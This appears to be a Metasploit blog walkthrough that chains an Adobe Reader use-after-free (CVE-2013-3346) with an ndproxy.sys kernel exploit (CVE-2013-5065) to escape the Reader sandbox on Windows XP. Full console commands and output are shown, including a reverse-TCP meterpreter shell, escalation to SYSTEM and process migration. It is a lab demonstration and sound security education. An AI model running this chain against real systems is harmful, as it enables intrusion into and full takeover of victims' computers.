Recently, FireEye identified and shared information about two vulnerabilities used in the wild to exploit Adobe Reader on Windows XP SP3 systems. The vulnerabilities are:

  • CVE-2013-3346: An Use After Free on Adobe Reader. Specifically in the handling of a ToolButton object, which can be exploited through document's Javascript. This vulnerability is used to get remote code execution through a malicious PDF document. The code will be executed in a renderer process, inside the Adobe Reader sandbox if available.
  • CVE-2013-5065: A out of bounds array access on the Windows kernel driver ndproxy.sys. This vulnerability allows to escape the Adobe Reader sandbox so execution of processes and persistence can be easily achieved. As has been already disclosed, remember which the Routing and Remote Access service must be enabled in the target so the NDProxy driver will be available.

Metasploit already has modules available for both vulnerabilities:

In this blog post we're going to explain how to chain both modules to accomplish Adobe Reader Sandbox bypass like in the wild.

  • First of all, a session from a Reader renderer process is needed. In order to get it, the file format or the browser version of the adobe_toolbutton exploit can be used. In this example, the browser version is used:
 
msf > use exploit/windows/browser/adobe_toolbutton
msf exploit(adobe_toolbutton) > set SRVHOST 192.168.172.1
SRVHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_toolbutton) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > exploit
[ ] Exploit running as background job.

[ ] Started reverse handler on 192.168.172.1:4444 
[ ] Using URL: http://192.168.172.1:8080/vMrwTnexHFjnis
[ ] Server started.
msf exploit(adobe_toolbutton) > [*] 192.168.172.244  adobe_toolbutton - Gathering target information.
[ ] 192.168.172.244  adobe_toolbutton - request: /vMrwTnexHFjnis/SZLfWc/
[ ] 192.168.172.244  adobe_toolbutton - Sending PDF...
[ ] Sending stage (769024 bytes) to 192.168.172.244
[ ] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1039) at 2013-12-17 16:10:55 -0600

msf exploit(adobe_toolbutton) > sessions -i 1
[ ] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
  • With this session shouldn't be possible to execute a new process, neither migrate to an existent process, because the Reader sandbox will prevent:
 
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List
============

 PID   PPID  Name          Arch  Session     User                           Path
 ---   ----  ----          ----  -------     ----                           ----
 3304  3128  AcroRd32.exe        4294967295                                 
 3336  3304  AcroRd32.exe  x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe             4294967295                                 


meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
 
  • Here is where the ms_ndproxy local exploit comes to the rescue. Use it with the current session. Remember which the target process, at the moment, is inside the sandbox, so the exploit will elevate the current one (you can not execute a new process).
meterpreter > background
[*] Backgrounding session 1...
msf exploit(adobe_toolbutton) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set SESSION 1
SESSION => 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
 
  • So even when there isn't new session in this case, the original should belong to SYSTEM if the exploit has been successful:
  
msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
  • Even when we're still inside a sandboxed process, now we should available to migrate, and finally execute new processes:
 
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List
============

 PID   PPID  Name          Arch  Session  User                           Path
 ---   ----  ----          ----  -------  ----                           ----
 3304  3128  AcroRd32.exe  x86   0        JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3336  3304  AcroRd32.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe       x86   0        JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe


meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2372 created.
meterpreter > ps -S calc
Filtering on process name...

Process List
============

 PID   PPID  Name      Arch  Session  User                           Path
 ---   ----  ----      ----  -------  ----                           ----
 2372  3824  calc.exe  x86   0        JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe


meterpreter > 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments